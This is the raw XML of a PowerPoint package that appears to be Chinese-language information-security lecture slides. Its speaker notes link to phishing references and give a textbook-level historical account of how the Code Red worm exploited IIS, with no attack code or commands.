
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="wmf" ContentType="image/x-wmf"/>
  <Default Extension="webp" ContentType="image/jpe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659" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId228"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId229"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="1346" r:id="rId2"/>
    <p:sldId id="1323" r:id="rId3"/>
    <p:sldId id="1470" r:id="rId4"/>
    <p:sldId id="1878" r:id="rId5"/>
    <p:sldId id="1879" r:id="rId6"/>
    <p:sldId id="1880" r:id="rId7"/>
    <p:sldId id="1881" r:id="rId8"/>
    <p:sldId id="1882" r:id="rId9"/>
    <p:sldId id="1883" r:id="rId10"/>
    <p:sldId id="1884" r:id="rId11"/>
    <p:sldId id="1885" r:id="rId12"/>
    <p:sldId id="1439" r:id="rId13"/>
    <p:sldId id="1440" r:id="rId14"/>
    <p:sldId id="1441" r:id="rId15"/>
    <p:sldId id="1446" r:id="rId16"/>
    <p:sldId id="1448" r:id="rId17"/>
    <p:sldId id="1669" r:id="rId18"/>
    <p:sldId id="1670" r:id="rId19"/>
    <p:sldId id="1667" r:id="rId20"/>
    <p:sldId id="1668" r:id="rId21"/>
    <p:sldId id="1873" r:id="rId22"/>
    <p:sldId id="1671" r:id="rId23"/>
    <p:sldId id="1877" r:id="rId24"/>
    <p:sldId id="1886" r:id="rId25"/>
    <p:sldId id="1640" r:id="rId26"/>
    <p:sldId id="1641" r:id="rId27"/>
    <p:sldId id="1642" r:id="rId28"/>
    <p:sldId id="1643" r:id="rId29"/>
    <p:sldId id="1887" r:id="rId30"/>
    <p:sldId id="1681" r:id="rId31"/>
    <p:sldId id="1435" r:id="rId32"/>
    <p:sldId id="1612" r:id="rId33"/>
    <p:sldId id="1849" r:id="rId34"/>
    <p:sldId id="1850" r:id="rId35"/>
    <p:sldId id="1619" r:id="rId36"/>
    <p:sldId id="1477" r:id="rId37"/>
    <p:sldId id="1474" r:id="rId38"/>
    <p:sldId id="1892" r:id="rId39"/>
    <p:sldId id="1893" r:id="rId40"/>
    <p:sldId id="1894" r:id="rId41"/>
    <p:sldId id="1478" r:id="rId42"/>
    <p:sldId id="1479" r:id="rId43"/>
    <p:sldId id="1480" r:id="rId44"/>
    <p:sldId id="1481" r:id="rId45"/>
    <p:sldId id="1482" r:id="rId46"/>
    <p:sldId id="1483" r:id="rId47"/>
    <p:sldId id="1484" r:id="rId48"/>
    <p:sldId id="1485" r:id="rId49"/>
    <p:sldId id="1630" r:id="rId50"/>
    <p:sldId id="1631" r:id="rId51"/>
    <p:sldId id="1632" r:id="rId52"/>
    <p:sldId id="1627" r:id="rId53"/>
    <p:sldId id="1487" r:id="rId54"/>
    <p:sldId id="1501" r:id="rId55"/>
    <p:sldId id="1504" r:id="rId56"/>
    <p:sldId id="1915" r:id="rId57"/>
    <p:sldId id="1848" r:id="rId58"/>
    <p:sldId id="1494" r:id="rId59"/>
    <p:sldId id="1490" r:id="rId60"/>
    <p:sldId id="1491" r:id="rId61"/>
    <p:sldId id="1505" r:id="rId62"/>
    <p:sldId id="1493" r:id="rId63"/>
    <p:sldId id="1500" r:id="rId64"/>
    <p:sldId id="1507" r:id="rId65"/>
    <p:sldId id="1510" r:id="rId66"/>
    <p:sldId id="1514" r:id="rId67"/>
    <p:sldId id="1508" r:id="rId68"/>
    <p:sldId id="1509" r:id="rId69"/>
    <p:sldId id="1512" r:id="rId70"/>
    <p:sldId id="1513" r:id="rId71"/>
    <p:sldId id="1875" r:id="rId72"/>
    <p:sldId id="1895" r:id="rId73"/>
    <p:sldId id="1515" r:id="rId74"/>
    <p:sldId id="1516" r:id="rId75"/>
    <p:sldId id="1517" r:id="rId76"/>
    <p:sldId id="1622" r:id="rId77"/>
    <p:sldId id="1623" r:id="rId78"/>
    <p:sldId id="1624" r:id="rId79"/>
    <p:sldId id="1520" r:id="rId80"/>
    <p:sldId id="1521" r:id="rId81"/>
    <p:sldId id="1522" r:id="rId82"/>
    <p:sldId id="1523" r:id="rId83"/>
    <p:sldId id="1524" r:id="rId84"/>
    <p:sldId id="1525" r:id="rId85"/>
    <p:sldId id="1526" r:id="rId86"/>
    <p:sldId id="1527" r:id="rId87"/>
    <p:sldId id="1528" r:id="rId88"/>
    <p:sldId id="1529" r:id="rId89"/>
    <p:sldId id="1608" r:id="rId90"/>
    <p:sldId id="1897" r:id="rId91"/>
    <p:sldId id="1607" r:id="rId92"/>
    <p:sldId id="1596" r:id="rId93"/>
    <p:sldId id="1598" r:id="rId94"/>
    <p:sldId id="1896" r:id="rId95"/>
    <p:sldId id="1552" r:id="rId96"/>
    <p:sldId id="1553" r:id="rId97"/>
    <p:sldId id="1554" r:id="rId98"/>
    <p:sldId id="1555" r:id="rId99"/>
    <p:sldId id="1891" r:id="rId100"/>
    <p:sldId id="1593" r:id="rId101"/>
    <p:sldId id="1672" r:id="rId102"/>
    <p:sldId id="1664" r:id="rId103"/>
    <p:sldId id="1662" r:id="rId104"/>
    <p:sldId id="1663" r:id="rId105"/>
    <p:sldId id="1665" r:id="rId106"/>
    <p:sldId id="1531" r:id="rId107"/>
    <p:sldId id="1532" r:id="rId108"/>
    <p:sldId id="1533" r:id="rId109"/>
    <p:sldId id="1534" r:id="rId110"/>
    <p:sldId id="1535" r:id="rId111"/>
    <p:sldId id="1539" r:id="rId112"/>
    <p:sldId id="1538" r:id="rId113"/>
    <p:sldId id="1540" r:id="rId114"/>
    <p:sldId id="1541" r:id="rId115"/>
    <p:sldId id="1542" r:id="rId116"/>
    <p:sldId id="1543" r:id="rId117"/>
    <p:sldId id="1674" r:id="rId118"/>
    <p:sldId id="1537" r:id="rId119"/>
    <p:sldId id="1666" r:id="rId120"/>
    <p:sldId id="1594" r:id="rId121"/>
    <p:sldId id="1595" r:id="rId122"/>
    <p:sldId id="1675" r:id="rId123"/>
    <p:sldId id="1679" r:id="rId124"/>
    <p:sldId id="1621" r:id="rId125"/>
    <p:sldId id="1673" r:id="rId126"/>
    <p:sldId id="1834" r:id="rId127"/>
    <p:sldId id="1840" r:id="rId128"/>
    <p:sldId id="1835" r:id="rId129"/>
    <p:sldId id="1698" r:id="rId130"/>
    <p:sldId id="1699" r:id="rId131"/>
    <p:sldId id="1841" r:id="rId132"/>
    <p:sldId id="1682" r:id="rId133"/>
    <p:sldId id="1842" r:id="rId134"/>
    <p:sldId id="1843" r:id="rId135"/>
    <p:sldId id="1677" r:id="rId136"/>
    <p:sldId id="1876" r:id="rId137"/>
    <p:sldId id="1844" r:id="rId138"/>
    <p:sldId id="1845" r:id="rId139"/>
    <p:sldId id="1676" r:id="rId140"/>
    <p:sldId id="1846" r:id="rId141"/>
    <p:sldId id="1847" r:id="rId142"/>
    <p:sldId id="1585" r:id="rId143"/>
    <p:sldId id="1587" r:id="rId144"/>
    <p:sldId id="1874" r:id="rId145"/>
    <p:sldId id="1611" r:id="rId146"/>
    <p:sldId id="1644" r:id="rId147"/>
    <p:sldId id="1430" r:id="rId148"/>
    <p:sldId id="1898" r:id="rId149"/>
    <p:sldId id="1889" r:id="rId150"/>
    <p:sldId id="1562" r:id="rId151"/>
    <p:sldId id="1563" r:id="rId152"/>
    <p:sldId id="1564" r:id="rId153"/>
    <p:sldId id="1566" r:id="rId154"/>
    <p:sldId id="1567" r:id="rId155"/>
    <p:sldId id="1568" r:id="rId156"/>
    <p:sldId id="1569" r:id="rId157"/>
    <p:sldId id="1570" r:id="rId158"/>
    <p:sldId id="1571" r:id="rId159"/>
    <p:sldId id="1572" r:id="rId160"/>
    <p:sldId id="1573" r:id="rId161"/>
    <p:sldId id="1574" r:id="rId162"/>
    <p:sldId id="1575" r:id="rId163"/>
    <p:sldId id="1576" r:id="rId164"/>
    <p:sldId id="1577" r:id="rId165"/>
    <p:sldId id="1578" r:id="rId166"/>
    <p:sldId id="1579" r:id="rId167"/>
    <p:sldId id="1580" r:id="rId168"/>
    <p:sldId id="1581" r:id="rId169"/>
    <p:sldId id="1582" r:id="rId170"/>
    <p:sldId id="1583" r:id="rId171"/>
    <p:sldId id="1890" r:id="rId172"/>
    <p:sldId id="1645" r:id="rId173"/>
    <p:sldId id="1646" r:id="rId174"/>
    <p:sldId id="1647" r:id="rId175"/>
    <p:sldId id="1648" r:id="rId176"/>
    <p:sldId id="1649" r:id="rId177"/>
    <p:sldId id="1650" r:id="rId178"/>
    <p:sldId id="1651" r:id="rId179"/>
    <p:sldId id="1652" r:id="rId180"/>
    <p:sldId id="1653" r:id="rId181"/>
    <p:sldId id="1654" r:id="rId182"/>
    <p:sldId id="1655" r:id="rId183"/>
    <p:sldId id="1656" r:id="rId184"/>
    <p:sldId id="1657" r:id="rId185"/>
    <p:sldId id="1658" r:id="rId186"/>
    <p:sldId id="1659" r:id="rId187"/>
    <p:sldId id="1660" r:id="rId188"/>
    <p:sldId id="1680" r:id="rId189"/>
    <p:sldId id="1852" r:id="rId190"/>
    <p:sldId id="1851" r:id="rId191"/>
    <p:sldId id="1853" r:id="rId192"/>
    <p:sldId id="1854" r:id="rId193"/>
    <p:sldId id="1857" r:id="rId194"/>
    <p:sldId id="1858" r:id="rId195"/>
    <p:sldId id="1859" r:id="rId196"/>
    <p:sldId id="1860" r:id="rId197"/>
    <p:sldId id="1861" r:id="rId198"/>
    <p:sldId id="1862" r:id="rId199"/>
    <p:sldId id="1856" r:id="rId200"/>
    <p:sldId id="1863" r:id="rId201"/>
    <p:sldId id="1864" r:id="rId202"/>
    <p:sldId id="1865" r:id="rId203"/>
    <p:sldId id="1866" r:id="rId204"/>
    <p:sldId id="1867" r:id="rId205"/>
    <p:sldId id="1868" r:id="rId206"/>
    <p:sldId id="1869" r:id="rId207"/>
    <p:sldId id="1870" r:id="rId208"/>
    <p:sldId id="1871" r:id="rId209"/>
    <p:sldId id="1872" r:id="rId210"/>
    <p:sldId id="1855" r:id="rId211"/>
    <p:sldId id="1899" r:id="rId212"/>
    <p:sldId id="1900" r:id="rId213"/>
    <p:sldId id="1901" r:id="rId214"/>
    <p:sldId id="1902" r:id="rId215"/>
    <p:sldId id="1903" r:id="rId216"/>
    <p:sldId id="1904" r:id="rId217"/>
    <p:sldId id="1905" r:id="rId218"/>
    <p:sldId id="1906" r:id="rId219"/>
    <p:sldId id="1907" r:id="rId220"/>
    <p:sldId id="1908" r:id="rId221"/>
    <p:sldId id="1909" r:id="rId222"/>
    <p:sldId id="1910" r:id="rId223"/>
    <p:sldId id="1911" r:id="rId224"/>
    <p:sldId id="1912" r:id="rId225"/>
    <p:sldId id="1913" r:id="rId226"/>
    <p:sldId id="1914" r:id="rId227"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="zh-CN"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma"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CA00"/>
    <a:srgbClr val="3366FF"/>
    <a:srgbClr val="0000CC"/>
    <a:srgbClr val="6699FF"/>
    <a:srgbClr val="000066"/>
    <a:srgbClr val="66FFCC"/>
    <a:srgbClr val="66CCFF"/>
    <a:srgbClr val="029A1B"/>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64" autoAdjust="0"/>
    <p:restoredTop sz="89335" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="134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22278"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-2832" y="22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27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide226.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide200.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22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tableStyles" Target="tableStyle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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide223.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presProps" Target="pres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openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="view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b="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10957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atin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10957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b="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10957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atin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3B4577F0-ED67-4FFE-A316-3B3AEC2EA4D6}"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b="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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atin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11162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4915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b="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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atin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E46A9642-FD4A-45CC-9F4F-8E10AB9AB4AA}"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baike.baidu.com/item/%E9%B1%BC%E5%8F%89%E6%94%BB%E5%87%BB" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide50.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/%E9%92%93%E9%B1%BC%E6%94%BB%E5%87%BB"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secrss.com/articles/18236"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6296D1-E5AE-4B9D-879B-9C26B33FA9CE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>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安天科技“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>从反恶意代码到对抗高级威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://mp.weixin.qq.com/s/C30LYAXfyNJovB-hNllCiQ</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“红色代码”蠕虫采用缓存区溢出技术， 利用微软</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的漏洞进行感染和传播。该病毒利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器的端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送一条含有大量乱码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求，目的是造成该系统缓存区溢出， 获得超级用户权限，然后继续使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向该系统送出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROOT.EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马程序，并在该系统运行，使病毒可以在该系统内存驻留， 并继续感染其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Code Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在向侵害对象发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>乱码时，总是在乱码前加上一个后缀为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的文件名，表示它正在请求该文件， 这是红色代码的重要特征</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sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>红色代码首先被</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>eEye</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Digital Security</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>公司的雇员</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Marc </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Maiffret</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ryan </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Permeh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
